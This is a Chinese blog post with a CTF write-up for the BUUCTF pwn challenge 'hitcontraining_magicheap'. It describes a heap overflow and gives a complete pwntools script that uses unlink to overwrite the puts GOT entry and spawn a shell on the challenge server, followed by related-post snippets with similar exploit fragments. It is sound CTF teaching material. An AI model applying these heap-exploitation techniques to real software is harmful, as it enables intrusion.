hitcontraining_magicheap buuctf

最新推荐文章于 2023-06-17 16:48:04 发布
最新推荐文章于 2023-06-17 16:48:04 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: PWN 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/122903239
版权

这题的漏洞点在编辑heap:

可以自定义编辑chunk内容的大小,存在堆溢出漏洞,这道题目打法也有很多。

我自己的思路是:

利用unlink实现任意地址写的效果,修改puts函数got表为l33t,然后getshell。

exp:

from pwn import *
p = remote("node4.buuoj.cn",25162)
#p = process("./magicheap")
e = ELF("./magicheap")
sh_addr = 0x400c50
bss_addr = 0x6020c0
context.log_level  ="debug"
p.timeout = 0.5
def add(size,content):
	p.recvuntil("Your choice :")
	p.sendline("1")
	p.recvuntil("Size of Heap : ")
	p.sendline(str(size))
	p.recvuntil("Content of heap:")
	p.sendline(content)
	p.recvuntil("SuccessFul\n")
def edit(index,size,content):
	p.recvuntil("Your choice :")
	p.sendline("2")
	p.recvuntil("Index :")
	p.sendline(str(index))
	p.recvuntil("Size of Heap : ")
	p.sendline(str(size))
	p.recvuntil("Content of heap : ")
	p.sendline(content)
	p.recvuntil("Done !\n")
def delete(index):
	p.recvuntil("Your choice :")
	p.sendline("3")
	p.recvuntil("Index :")
	p.sendline(str(index))
	p.recvuntil("Done !\n")

add(0x30,"a"*0x30)#0
add(0x30,"a"*0x30)#1
add(0x80,"a"*0x80)#2
add(0x10,"a"*0x10)# 
pl1 = p64(0) + p64(0x31) + p64(bss_addr - 0x10) + p64(bss_addr-0x8) + p64(0) + p64(0)
pl1+=  p64(0x30) + p64(0x90)
edit(1,0x40,pl1)
delete(2)
pl2 = p64(0) + p64(0) + p64(e.got["puts"])
edit(1,0x30,pl2)
edit(0,0x8,p64(sh_addr))
# gdb.attach(p)
# pause()
p.interactive()

执行脚本,成功拿到shell!

 

cut_maize
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buuctf pwn(wustctf2020_closed)(hitcontraining_magicheap)(axb_2019_fmt32)
cainiao78777的博客
04-29 227
程序有alarm闹钟函数,并且有明显的格式化字符串漏洞,而且能无限利用格式化字符串漏洞,本来想用我之前的那种解法直接解决的,但是遇到了些问题(下面说),而且这个题目got表可写,所以还是老老实实打got表吧。2.编辑堆块,根据bss段里的指针,来找到相应的堆块,然后输入大小,再填充内容,并未检测原本输入堆块内容的大小,那么此处存在堆溢出。再通过读入,覆盖dest的指针为free的got表地址,然后strcpy将free的got表地址的地址覆盖为shllcode的地址。
BUUCTFhitcontraining_magicheap
weixin_51055545的博客
02-13 1646
BUUCTFhitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
hitcontraining_magicheap
m0sway的博客
12-21 312
hitcontraining_magicheap 使用checksec查看: 一道堆题,关闭了PIE,可以考虑覆盖got表来获取system getshell 拉进IDA中查看: 标准的菜单,main()函数就不贴截图了,menu()函数也没有营养,图也不贴了, 先来看看create_heap(): heaparray[i]:存放 chunk 的地址。 read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。 heaparray是存放在bss段上的
[BUUCTF]PWN——hitcontraining_magicheap
mcmuyanga的博客
01-07 1060
hitcontraining_magicheap 附件 步骤: 例行检查,64位程序,开启了nx和canary 本地试运行一下,经典的堆的菜单 64位ida载入,检索程序里的字符串的时候发现了后门 main() 可以看到,当v5=4=4869,而且magic在bss段,只要覆写magic>0x1305就能够获取到shell create_heap() edit_heap() delete_heap() 利用思路:首先通过 unsorted bin attack 覆盖 magic>
hitcontraining_magicheap-unlink
最新发布
个人笔记
06-17 158
heaparray全局指针=0x6020C0;
hitcontraining magicheap
pondzhang的专栏
06-16 352
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
ctf-pwn-堆—unsorted bin attack
xy_369的博客
05-23 210
上面只需要知道unsorted bin实现了将栈上的一个变量值变为了main_arena结构体中的一个地址,这句话仅出于个人理解,从参考链接2里得到的理解。1、个人翻译过后的代码(翻译自参考链接2)3、删除部分打印函数的代码。
HITCON Training lab14——magic heap
04-19 413
64位程序,没开PIE  #Unsorted Bin Attack 先回顾一下 Unsorted Bin 的基本来源以及基本使用情况。 基本来源 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,...
hitcontraining_heapcreator
m0sway的博客
01-07 2846
hitcontraining_heapcreator 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看: 看到菜单,堆题,放进IDA中查看: 分布来查看,首先是create_heap(): heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址 edit_heap(): rea
HITCON-Training lab13 heapcreator(heap extend)
像初雪一样自由洒落
04-16 952
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建堆 编辑 对比建堆,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
【unstored bin attack】hitcontraining_magicheap
huzai9527的博客
04-14 130
【unstored bin attack】 1.ida分析 2.思路 经典的unstored bin attack,修改unstored bin 中的bk为magic-0x10 即可将magic改为一个较大的数 3.exp from pwn import * p = remote('node3.buuoj.cn',25879) #p = process('./magicheap') context.log_level = 'debug' def add(size,cont): p.sendlin
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 328
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 979
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
buuctf magicheap
qq_42728977的博客
04-22 208
主要是unsorted bin 在拖链的时候的一些细节 参考
攻防世界进阶noleak
qq_42728977的博客
04-07 386
题目:XCTF 4th-QCTF-2018 noleak 难度:**** 漏洞点:UAF \unsorted bin sttack\partial write bypass PIE\unlink 参考链接: 伪造堆块绕过unlink检查(ctf-QiangWangCup-2015-shellman) 攻防世界PWN之Noleak(一题学了好多知识)题解 ctfwiki CTF pwn 中最通俗易懂...
buuctf [V&N2020 公开赛]warmup
qq_42728977的博客
04-14 445
禁了exceve,只能用open》read》puts了 参考链接 https://www.cnblogs.com/luoleqi/p/12468271.html http://www.starssgo.top/2020/03/04/%C2%96%C2%96%C2%96%C2%96-V-N2020-%E5%85%AC%E5%BC%80%E8%B5%9B-pwn/#warmup ...
CTF之一天一题:攻防世界的web进阶之Cat
qq_42728977的博客
08-27 1475
这个题做的还是太明白,看了许多wp。在此小记录一下。 题目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
buuctf cmcc_simplerop
qq_42728977的博客
04-11 276
系统调用+rop https://www.cnblogs.com/bhxdn/p/12330142.html https://blog.csdn.net/xiaominthere/article/details/17287965
BUUCTF Misc
qq_45784859的博客
04-26 1138
基础破解 题目 给你一个压缩包,你并不能获得什么,因为他是四位数字加密的哈哈哈哈哈哈哈。。。不对= =我说了什么了不得的东西。里面还有一个压缩包。 思路 很明显里面那个rar压缩包需要暴力破解,密码是四位的数字,用i相关工具直接破解就可以得到flag,解密后里面是一个base64加密的字符串,解密即可得到flag。 你竟然赶我走 题目 里面是一张图片,用Winhex打开后搜索flag就可以看到。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值